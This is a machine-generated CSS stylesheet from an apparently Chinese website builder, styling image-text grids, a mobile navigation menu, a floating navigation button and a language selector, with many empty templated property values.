#module_383571646 .showHandle .btn{font-size:14px;}
#module_383571646 .showHandle .btn{font-family:;}
#module_383571646 .showHandle .btn{color:#333;}
#module_383571646 .showHandle .btn{font-weight:400;}
#module_383571646 .showHandle .btn{text-decoration:none;}
#module_383571646 .showHandle .btn{font-style:normal;}
#module_383571646 .showHandle div{border-top-color:#ddd !important;}
#module_383571646 .showHandle div{border-top-style:solid !important;}
#module_383571646 .showHandle div{border-top-width:1px !important;}
#module_383571646 .showHandle{background-color:transparent;}
#module_383571646 .showHandle{}
#module_383571646 .showHandle{background-repeat:no-repeat;}
#module_383571646 .showHandle{}
#module_383571646 .showHandle{}
#module_383571646 .showHandle{}
#module_383571646 a{font-size:unset;font-family:unset}
/*图文模块 layout 103*/
.ModuleImageTextGiant.layout-109 .imageTextGiant-Container .row { display: flex; flex-wrap: wrap;justify-content: center; margin: 0 !important;}
.ModuleImageTextGiant.layout-109 .imageTextGiant-Container{max-height: 100%; max-width: 100%;}
.ModuleImageTextGiant.layout-109 .imageTextContainer{overflow:unset !important;}

@media only screen and (min-width: 767px) {
	
	.ModuleImageTextGiant.layout-109 .normal_ImgtextBox:last-child{ margin-right: 0 !important;}
}
@media only screen and (max-width: 767px) {
	.ModuleImageTextGiant.layout-109 .MobileImgtextBox:nth-child(2n){ margin-right: 0 !important;}
	/*.ModuleImageTextGiant.layout-109 .imageTextGiant-Container .row{display: inline-block;*/
	/*	flex-wrap: wrap;flex: auto;}*/
	.ModuleImageTextGiant.layout-109 .imageTextGiant-Container .row .col-xs-6{
		width: 49%;
    	/*padding: 10px 0 10px 10px;*/
   		 box-sizing: border-box;
	}
	.ModuleImageTextGiant.layout-109 .oneline{ width: 100% !important;}
	/* .ModuleImageTextGiant.layout-109 .oneline:nth-child(1){ margin-top: 0 !important; }
	
	.ModuleImageTextGiant.layout-109 .twoline:nth-child(1),.ModuleImageTextGiant.layout-109 .twoline:nth-child(2){ margin-top: 0 !important; } */
}

/*@media only screen and (min-width: 992px) and (max-width: 1199px) {*/
	/*.ModuleImageTextGiant.layout-109 .imageTextGiant-Container .row{width:auto;}*/
/*}*/
/*@media only screen and (min-width: 769px) and (max-width: 991px) {*/
	/*.ModuleImageTextGiant.layout-109 .imageTextGiant-Container .row{width:auto;}*/
	/*.ModuleImageTextGiant.layout-109 .imageTextGiant-Container .row .col-xs-6{width: 49.66666%;!*padding: 15px 15px 0 15px;*!}*/
	/*.ModuleImageTextGiant.layout-109 .normal_ImgtextBox_content .GraphicUpper{padding-bottom: 15px;}*/
/*}*/.module_383568897 .ModuleHead .HeadCenter{float:none;}
#module_383568897 {
padding:0px;
}
#module_383568897 {
position:static;
z-index:0;
top:6528px;
left:1234px;
width:100%;
height: auto;
}
#module_383568897 .ModuleHead383568897 {
display:none;
}
#module_383568897 {
border:none;
}
@media screen and (min-width: 768px){
#module_383568897 >.module_383568897 {
margin-top:3.7415%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568897 >.module_383568897 {
}
}

#module_383568897 .GraphicUpper .TextImage{border-top-left-radius:px;}
#module_383568897 .GraphicUpper .TextImage{border-top-right-radius:px;}
#module_383568897 .GraphicUpper .TextImage{border-bottom-left-radius:px;}
#module_383568897 .GraphicUpper .TextImage{border-bottom-right-radius:px;}
#module_383568897 .GraphicUpper .TextImage{padding-top:px;}
#module_383568897 .GraphicUpper .TextImage{padding-bottom:px;}
#module_383568897 .GraphicUpper .TextImage{padding-left:px;}
#module_383568897 .GraphicUpper .TextImage{padding-right:px;}
#module_383568897 .GraphicUpper .TextImage{width:%;}
#module_383568897 .GraphicUpper .MobileTextImage{width:%;}
#module_383568897 .imageTextGiant-Container .GraphicUpper{ text-align:;}
#module_383568897 .ModuleImageTextGiantContent{padding-top:px;}
#module_383568897 .ModuleImageTextGiantContent{padding-bottom:px;}
#module_383568897 .ModuleImageTextGiantContent{padding-left:px;}
#module_383568897 .ModuleImageTextGiantContent{padding-right:px;}
#module_383568897 .normal_ImgtextBox{padding-top:px;}
#module_383568897 .normal_ImgtextBox{padding-bottom:px;}
#module_383568897 .normal_ImgtextBox{padding-left:px;}
#module_383568897 .normal_ImgtextBox{padding-right:px;}
#module_383568897 .normal_ImgtextBox{margin-top:px;margin-bottom:px;}
#module_383568897 .normal_ImgtextBox.col-lg-6 {margin-right:px; width:calc((99% - px * 5)/ 6)} #module_383568897 .normal_ImgtextBox.col-lg-5 {margin-right:px; width:calc((99% - px * 4)/ 5)} #module_383568897 .normal_ImgtextBox.col-lg-4 {margin-right:px; width:calc((99% - px * 3)/ 4)} #module_383568897 .normal_ImgtextBox.col-lg-3 {margin-right:px; width:calc((99% - px * 2)/ 3)} #module_383568897 .normal_ImgtextBox.col-lg-2 {margin-right:px; width:calc((99% - px)/ 2)}  #module_383568897 .MobileImgtextBox{margin-right:px;margin-left:0; width:calc((99% - px) / 2);}
#module_383568897 .normal_ImgtextBox{box-shadow:;}
#module_383568897 .normal_ImgtextBox{background-color:;}
#module_383568897 .normal_ImgtextBox{}
#module_383568897 .normal_ImgtextBox{}
#module_383568897 .normal_ImgtextBox{}
#module_383568897 .normal_ImgtextBox{}
#module_383568897 .normal_ImgtextBox{}
#module_383568897 .normal_ImgtextBox{border-top-left-radius:px;}
#module_383568897 .normal_ImgtextBox{border-top-right-radius:px;}
#module_383568897 .normal_ImgtextBox{border-bottom-left-radius:px;}
#module_383568897 .normal_ImgtextBox{border-bottom-right-radius:px;}
#module_383568897 .normal_ImgtextBox{border-top-color:;}
#module_383568897 .normal_ImgtextBox{border-top-style:;}
#module_383568897 .normal_ImgtextBox{border-top-width:px;}
#module_383568897 .normal_ImgtextBox{border-right-color:;}
#module_383568897 .normal_ImgtextBox{border-right-style:;}
#module_383568897 .normal_ImgtextBox{border-right-width:px;}
#module_383568897 .normal_ImgtextBox{border-bottom-color:;}
#module_383568897 .normal_ImgtextBox{border-bottom-style:;}
#module_383568897 .normal_ImgtextBox{border-bottom-width:px;}
#module_383568897 .normal_ImgtextBox{border-left-color:;}
#module_383568897 .normal_ImgtextBox{border-left-style:;}
#module_383568897 .normal_ImgtextBox{border-left-width:px;}
#module_383568897 .showHandle .btn{font-size:px;}
#module_383568897 .showHandle .btn{font-family:;}
#module_383568897 .showHandle .btn{color:;}
#module_383568897 .showHandle .btn{}
#module_383568897 .showHandle .btn{}
#module_383568897 .showHandle .btn{}
#module_383568897 .showHandle div{border-top-color: !important;}
#module_383568897 .showHandle div{border-top-style: !important;}
#module_383568897 .showHandle div{border-top-width:px !important;}
#module_383568897 .showHandle{background-color:;}
#module_383568897 .showHandle{}
#module_383568897 .showHandle{}
#module_383568897 .showHandle{}
#module_383568897 .showHandle{}
#module_383568897 .showHandle{}
#module_383568897 .normal_ImgtextBox:hover{box-shadow:;}
#module_383568897 .normal_ImgtextBox:hover{border-top-color:;}
#module_383568897 .normal_ImgtextBox:hover{border-top-style:;}
#module_383568897 .normal_ImgtextBox:hover{border-right-color:;}
#module_383568897 .normal_ImgtextBox:hover{border-right-style:;}
#module_383568897 .normal_ImgtextBox:hover{border-bottom-color:;}
#module_383568897 .normal_ImgtextBox:hover{border-bottom-style:;}
#module_383568897 .normal_ImgtextBox:hover{border-left-color:;}
#module_383568897 .normal_ImgtextBox:hover{border-left-style:;}
#module_383568897 a{font-size:unset;font-family:unset}
.ModuleGridContainer.ModuleGridContainer383568416 #Sub383568416_5 {width:22.9688%;}
.module_383568472 .ModuleHead .HeadCenter{float:none;}
#module_383568472 {
padding:0px;
}
#module_383568472 {
position:static;
z-index:0;
width:100%;
height: auto;
}
#module_383568472 .ModuleHead383568472 {
display:none;
}
#module_383568472 .BodyCenter.BodyCenter383568472 {
background:none;background-color:rgb(63, 71, 86);
}
#module_383568472 >.module_383568472 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383568472 >.module_383568472{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383568472 .BodyCenter.BodyCenter383568472 {
padding-top:0.4184%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.8368%;
}
}
@media screen and (max-width: 767px){
#module_383568472 .BodyCenter.BodyCenter383568472 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (min-width: 768px){
#module_383568472 >.module_383568472 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568472 >.module_383568472 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
#module_383568472 >.module_383568472 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383568472:hover {
border:none;
}
#module_383568472:hover >.module_383568472 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383568472 .ModuleSubContainer{background-color:transparent;}
#module_383568472 .ModuleSubContainer{background-image:none;}
#module_383568472 .ModuleSubContainer{background-repeat:no-repeat;}
#module_383568472 .ModuleSubContainer{background-position:0% 0%;}
#module_383568472 .ModuleSubContainer{background-attachment:scroll;}
#module_383568472 .ModuleSubContainer{}
#module_383568472 {!bgVideo!}{bgVideoUrl:none}
#module_383568472 .gridBgVideo .bgVideoMask{opacity:0.2}
#module_383568472 .ModuleSubContainer{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0); transition: box-shadow 0.5s ease;}
#module_383568472 .ModuleSubContainer:hover{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0);}
.ModuleGridContainer.ModuleGridContainer383568472 {max-width:1280px;width:auto;}
.module_383568873 .ModuleHead .HeadCenter{float:none;}
#module_383568873 {
padding:0px;
}
#module_383568873 {
position:static;
z-index:0;
top:4995px;
left:1069px;
width:100%;
height: auto;
}
#module_383568873 .ModuleHead383568873 {
display:none;
}
#module_383568873 .BodyCenter.BodyCenter383568873 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383568873 >.module_383568873 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383568873 >.module_383568873{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383568873 .BodyCenter.BodyCenter383568873 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568873 .BodyCenter.BodyCenter383568873 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (min-width: 768px){
#module_383568873 >.module_383568873 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568873 >.module_383568873 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
#module_383568873 >.module_383568873 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383568873:hover {
border:none;
}
#module_383568873:hover >.module_383568873 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383568873 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383568873 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383568873 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383568873 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383568873 .imageTextGiant-Container{padding-top:10px;}
#module_383568873 .imageTextGiant-Container{padding-bottom:10px;}
#module_383568873 .imageTextGiant-Container{padding-left:10px;}
#module_383568873 .imageTextGiant-Container{padding-right:10px;}
#module_383568873 .showHandle .btn{font-size:14px;}
#module_383568873 .showHandle .btn{font-family:微软雅黑,Microsoft YaHei;}
#module_383568873 .showHandle .btn{color:#333;}
#module_383568873 .showHandle .btn{font-weight:400;}
#module_383568873 .showHandle .btn{text-decoration:none;}
#module_383568873 .showHandle .btn{font-style:normal;}
#module_383568873 .showHandle div{border-top-color:#ddd !important;}
#module_383568873 .showHandle div{border-top-style:solid !important;}
#module_383568873 .showHandle div{border-top-width:1px !important;}
#module_383568873 .showHandle{background-color:transparent;}
#module_383568873 .showHandle{background-image:none;}
#module_383568873 .showHandle{background-repeat:no-repeat;}
#module_383568873 .showHandle{}
#module_383568873 .showHandle{}
#module_383568873 .showHandle{}
#module_383568873 a{font-size:unset;font-family:unset}
.ModuleMobileNavGiant.layout-102 p{ color: #fff;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li a p{
    font-size: 15px;
    width:12rem;/*要显示文字的宽度*/
    overflow:hidden; /*超出的部分隐藏起来。*/
    white-space:nowrap;/*不显示的地方用省略号...代替*/
    text-overflow:ellipsis;/* 支持 IE */
}
.ModuleMobileNavGiant.layout-102 .micro-nav-item{ background:#f84b14;height: calc(100vh);}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li{  color: #fff;  }
.ModuleMobileNavGiant.layout-102  .header-model{width: 100%; height: 3rem;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li a{padding: 0 25px; color: #fff; display: block;font-size: 15px;  height: 56px; border-bottom: 1px solid #fa825a; position: relative;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li i{ width:21px; line-height: 25PX; height: 25px;  display: inline-block; margin-right: 20px; position: absolute; top: 50%;  transform: translateY(-50%);}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li .home{  background: url("http://cdn-hk.wds168.cn/images/index.png") no-repeat left; background-size: 100% auto; }
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li .about-us{ background: url("http://cdn-hk.wds168.cn/images/about-us.png") no-repeat left;background-size: 100% auto;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li .product-center{  background: url("http://cdn-hk.wds168.cn/images/pro.png") no-repeat left;background-size: 100% auto;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li .news{ background: url("http://cdn-hk.wds168.cn/images/news.png") no-repeat left;background-size: 100% auto;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li .case{  background: url("http://cdn-hk.wds168.cn/images/anli.png") no-repeat left;background-size: 100% auto;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul li p{ font-size: 15px;position: absolute; top: 50%; color: #fff; transform: translateY(-50%); margin-left: 2.06rem;}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul#accordion>li.open>a .more {
    -webkit-transform: translateX(-50%) rotate(90deg);
    -ms-transform: translateX(-50%) rotate(90deg);
    -o-transform: translateX(-50%) rotate(90deg);
    transform: translateX(-50%) rotate(90deg);
    margin-top: -12px;
}
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul  li ul .open .more {
    -webkit-transform: translateX(-50%) rotate(90deg);
    -ms-transform: translateX(-50%) rotate(90deg);
    -o-transform: translateX(-50%) rotate(90deg);
    transform: translateX(-50%) rotate(90deg);
    margin-top: -12px;
}
.ModuleMobileNavGiant.layout-102 .micro-nav-item::-webkit-scrollbar {  display: none;}
.ModuleMobileNavGiant.layout-102 .micro-nav,#accordion {  height: calc(100vh - 3rem);  }
.ModuleMobileNavGiant.layout-102 .micro-nav {  position: relative;  overflow: hidden;  }
.ModuleMobileNavGiant.layout-102 .micro-nav-item{  position: absolute; left: 0; width: 100%; overflow-x: hidden;overflow-y: scroll;height: calc(100%); }
.ModuleMobileNavGiant.layout-102 header { display: flex;  height:50px!important;  background: #f84b14;  font-size: 16px;  font-weight: 700;  color: #fff;  line-height: 50px;  -moz-box-sizing: border-box;  box-sizing: border-box;  width: 100%;  height: 50px;  padding: 0 0  }
.ModuleMobileNavGiant.layout-102 header {  box-sizing: border-box;  width: 100%  }
.ModuleMobileNavGiant.layout-102 header {  position: fixed; top: 0;  text-align: center;z-index: 950; margin: 0 auto  }

.ModuleMobileNavGiant.layout-102 .micro-nav{ position: fixed; top: 50px;    width: 100%;display: none; z-index: 9999;}
.ModuleMobileNavGiant.layout-102 .micro-nav .more{ width: .5rem; height: 1.2rem; background: #fff; display: inline-block; position: absolute; left: 50%;top: 50%;  transform: translate(-50%,-50%); background: url("../image/tubiao.png") no-repeat right; background-size: 100% auto;    transition: all 0.4s ease;}
.ModuleMobileNavGiant.layout-102 .subnav li{border-bottom-style: none !important;}
/*二级导航*/
.ModuleMobileNavGiant.layout-102 .micro-nav-item ul ul li a{ display:block;padding-left: 78px; background: #ff6637; height: 56px; line-height: 56px;font-size: 15px;position:relative;}
.ModuleMobileNavGiant.layout-102 #header p img{ max-height: 40px;     padding-right: 8pt;
    padding-left: 8pt; /*padding-left:40px;margin-right: 8px; margin-left: 15px;*/}
.ModuleMobileNavGiant.layout-102 .navcontent{ width: calc(100% - 60px);display:flex;  margin-left: 50px;    margin-right: 8pt;}
.ModuleMobileNavGiant.layout-102 .navcontent a{  width: 56px; text-align: center;    display: block;}


.ModuleMobileNavGiant.layout-102 .icons {
    font-size: 16pt;
    color: #fff;
}

.ModuleMobileNavGiant.layout-102 .svgdiv {
    height: 100%;
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
    position: relative;
    z-index: 999;
}

.ModuleMobileNavGiant.layout-102 .svgdiv svg {
    width: 16pt;
    height: 16pt;
    position: relative;
    z-index: -1;
}
@media only screen and (min-width: 768px){
    .ModuleMobileNavGiant.layout-102  #header,.ModuleMobileNavGiant.layout-102 .micro-nav-item{ display: none !important;}
    #mobileDesignerContainer #pagebody{  margin-top:0px;  }
    .ModuleMobileNavGiant.layout-102 .header-model{ display: none;}
}
/*三级导航*/
.ModuleMobileNavGiant.layout-102 .subnav .subnav a{padding-left: 131px;}

.ModuleMobileNavGiant.layout-102 .moreOpen{
    position: absolute;
    right: 9px;
    top: 50%;
    width: 3rem;
    height: 3rem;
    transform: translateY(-50%);
}
.ModuleMobileNavGiant.layout-102 #header p{
    overflow: hidden;
    white-space: nowrap;
    text-overflow: ellipsis;
    margin-left: 0;
    width: 100%;
    /* max-width: 80%; */
}
.ModuleMobileNavGiant.layout-102 .icon-dianhua-moren{ font-weight: normal;}
.ModuleMobileNavGiant.layout-102 .icon-sousuo{ font-weight: 750;}.module_383569206 .ModuleHead .HeadCenter{float:none;}
#module_383569206 {
padding:0px;
}
#module_383569206 {
}
#module_383569206 .ModuleHead383569206 {
display:none;
}
#module_383569206 .BodyCenter.BodyCenter383569206 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383569206 >.module_383569206 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383569206 >.module_383569206{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383569206 .BodyCenter.BodyCenter383569206 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383569206 .BodyCenter.BodyCenter383569206 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (min-width: 768px){
#module_383569206 >.module_383569206 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383569206 >.module_383569206 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
#module_383569206 >.module_383569206 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383569206:hover {
border:none;
}
#module_383569206:hover >.module_383569206 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383569206 .langlistbox{background-color:} #module_383569206 .langlistbox .jt{border-bottom-color:}
#module_383569206 .langlistbox .langinfo{color:}
#module_383569206 .langlistbox .langinfo{background-color:}
#module_383569206 .langlistbox .langinfo{border-color:}
#module_383569206 .langlistbox .langtxt{ font-size:px }
#module_383569206 .langlistbox .langtxt{ color: }
#module_383569206 {}#module_383569206.layout-102 #header{border-bottom-color:transparent;}
#module_383569206 {}#module_383569206.layout-102 #header{border-bottom-style:none;}
#module_383569206 {}#module_383569206.layout-102 #header{border-bottom-width:0px;}
#module_383569206 {}#module_383569206.layout-102 #header{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0.1);}
#module_383569206 {}#module_383569206.layout-102 #MobileNav{background-color: transparent;} #module_383569206.layout-102 #header{background:rgb(255, 255, 255);}
#module_383569206 {}#module_383569206.layout-102 #header{}
#module_383569206 {}#module_383569206.layout-102 #header p{color:rgb(0, 0, 0);}
#module_383569206 {}#module_383569206.layout-102 .lcitem .rect{background:rgb(156, 0, 0);} #module_383569206.layout-102 .icons{color:rgb(156, 0, 0);} #module_383569206.layout-102 .svgdiv svg>*{fill:rgb(156, 0, 0);}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item ul li a{border-bottom-color:#fd8b68;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item{background-color:rgb(192, 0, 0);}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item{}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li>a{background:#f10215;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li>a{}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li>a,#module_383569206.layout-102 .micro-nav-item>ul>li>a p{color:#fff;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a{background:#f10215;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a{}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a,#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a p{color:#fff;}
#module_383569206 {}#module_383569206.layout-102 #header p{font-family:;}
#module_383569206 {}#module_383569206.layout-102 #header p{font-size:px;}
#module_383569206 {}#module_383569206.layout-102 #header p{}
#module_383569206 {}#module_383569206.layout-1012 #header p{}
#module_383569206 {}#module_383569206.layout-102 #header p{}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li>a,#module_383569206.layout-102 .micro-nav-item>ul>li>a p{font-family:;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li>a,#module_383569206.layout-102 .micro-nav-item>ul>li>a p{font-size:px;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a,#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a p{font-family:;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a,#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a p{font-size:px;}
#module_383569206 .langlistbox li:hover .langinfo,#module_383569206 .langactive .langinfo {color:}
#module_383569206 .langlistbox li:hover .langinfo,#module_383569206 .langactive .langinfo{background-color:}
#module_383569206 .langlistbox li:hover .langinfo,#module_383569206 .langactive .langinfo{border-color:}
#module_383569206 .langlistbox li:hover .langtxt,#module_383569206 .langactive .langtxt{ color: }
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li>a:hover,#module_383569206.layout-102 .micro-nav-item>ul>li.active>a:hover{background:#f10215;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li>a:hover,#module_383569206.layout-102 .micro-nav-item>ul>li.active>a:hover{}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li.active>a:hover p,#module_383569206.layout-102 .micro-nav-item>ul>li>a:hover p{color:#fff;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a:hover,#module_383569206.layout-102 .micro-nav-item>ul>li .subnav li.active>a:hover{background:#f10215;}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a:hover,#module_383569206.layout-102 .micro-nav-item>ul>li .subnav li.active>a:hover{}
#module_383569206 {}#module_383569206.layout-102 .micro-nav-item>ul>li .subnav li.active a:hover p,#module_383569206.layout-102 .micro-nav-item>ul>li .subnav a:hover p{color:#fff;}
.ModuleMobileFloatNavGiant {position: fixed;
     z-index: 4998;}
.ModuleMobileFloatNavGiant .defaultbtn{ position: relative; box-shadow: 0pt 1.5pt 3pt 0pt rgba(0,0,0,0.16); background-color: #fff;
    width:50px; height: 50px; border-radius: 50%;}
.ModuleMobileFloatNavGiant .spotgroup,.ModuleMobileFloatNavGiant .itemicon{  position: absolute;color: green;
    top: 50%;
    left: 50%;
    transform: translate(-50%,-45%);
    font-size: 16px;
}
.ModuleMobileFloatNavGiant svg {
    width: 22px;
    height: 22px;
    margin-top: 5px;
}


.ModuleMobileFloatNavGiant .itemicon{ color: black;}
.ModuleMobileFloatNavGiant .itembtn{ display: block; position: relative; box-shadow: 0pt 1.5pt 3pt 0pt rgba(0,0,0,0.16); background-color: #fff;
    width:45px; height: 45px; border-radius: 50%; margin-bottom: 15px;}
.ModuleMobileFloatNavGiant .itemtext{
    position: relative;
    left: -60px;
    background: #fff;
    padding: 5px 14px;
    border-radius: 4px;
    top: 50%;
    transform: translateY(-50%);
    font-size: 12px;
    box-shadow: 0px 1.5px 10px 0px rgba(0,0,0,0.16);
    color: #666;
    box-sizing: content-box;
    white-space: nowrap;
    /* min-width: 80px; */
}
.ModuleMobileFloatNavGiant .defaultbtnbghover{
    transform: rotate(180deg);
    transition: all 0.5s;
}
.ModuleMobileFloatNavGiant .itemtextright{
    text-align: right;
}
.ModuleMobileFloatNavGiant .itemtextleft{
    text-align: left;
}
.ModuleMobileFloatNavGiant .itemtextright::before{
    border-left: 8px solid #fff;
    border-top: 8px solid transparent;
    border-bottom: 8px solid transparent;
    top: 50%;
    right: -8px;
    position: absolute;
    transform: translateY(-50%);
    content: '';
}
.ModuleMobileFloatNavGiant .itemtextleft::before{
    border-right: 8px solid #fff;
    border-top: 8px solid transparent;
    border-bottom: 8px solid transparent;
    top: 50%;
    left: -7px;
    position: absolute;
    transform: translateY(-50%);
    content: '';
}
.ModuleMobileFloatNavGiant .FloatNavitemlist{ height: 0; display: none; transition:all}
.itemimg{
    max-height: 25px;
    max-width: 25px;
    background-repeat: no-repeat !important;
    background-position: center !important;
    background-size: cover !important;
    width: 100%;
    height: 100%
}
.FloatNavMask {
    position: absolute;
    top: 0;
    width: 100%;
    height: 100%;
    filter: alpha(opacity=50);
    opacity: 0.50;
    background: #000;
    z-index: 15;
}
.FloatNavQRCode span img {
    border: solid 0.625rem #fff;
}
.FloatNavQRCode span {
    display: block;
    overflow: hidden;
    bottom: 3.750rem;
    right: 0.625rem;
    position: fixed;
    z-index: 20;
}
.FloatNavQRCode {
    display: none;
    position: fixed;
    top: 0;
    overflow: hidden;
    width: 100%;
    height: 100%;
    z-index: 10;
    text-align: center;
}.module_383569204 .ModuleHead .HeadCenter{float:none;}
#module_383569204 {
padding:0px;
}
#module_383569204 {
}
#module_383569204 .ModuleHead383569204 {
display:none;
}
#module_383569204 .BodyCenter.BodyCenter383569204 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383569204 >.module_383569204 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383569204 >.module_383569204{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383569204 .BodyCenter.BodyCenter383569204 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (max-width: 767px){
#module_383569204 .BodyCenter.BodyCenter383569204 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (min-width: 768px){
#module_383569204 >.module_383569204 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
@media screen and (max-width: 767px){
#module_383569204 >.module_383569204 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
#module_383569204 >.module_383569204 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383569204:hover {
border:none;
}
#module_383569204:hover >.module_383569204 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383569204 .defaultbtn{background-color:#fff}
#module_383569204 .defaultbtn{}
#module_383569204 .spotgroup{color:#f10215}
#module_383569204 .itembtn{background-color:#fff}
#module_383569204 .itembtn{}
#module_383569204 .itemicon{color:#666} #module_383569204 svg>*{fill:#666}
#module_383569204 .itemtext{background-color:#fff} #module_383569204 .itemtextright::before{border-left-color:#fff} #module_383569204 .itemtextleft::before{border-right-color:#fff}
#module_383569204 .itemtext{}
#module_383569204 .itemtext{font-size:12px;}
#module_383569204 .itemtext{font-family:微软雅黑,Microsoft YaHei;}
#module_383569204 .itemtext{color:#666 !important;}
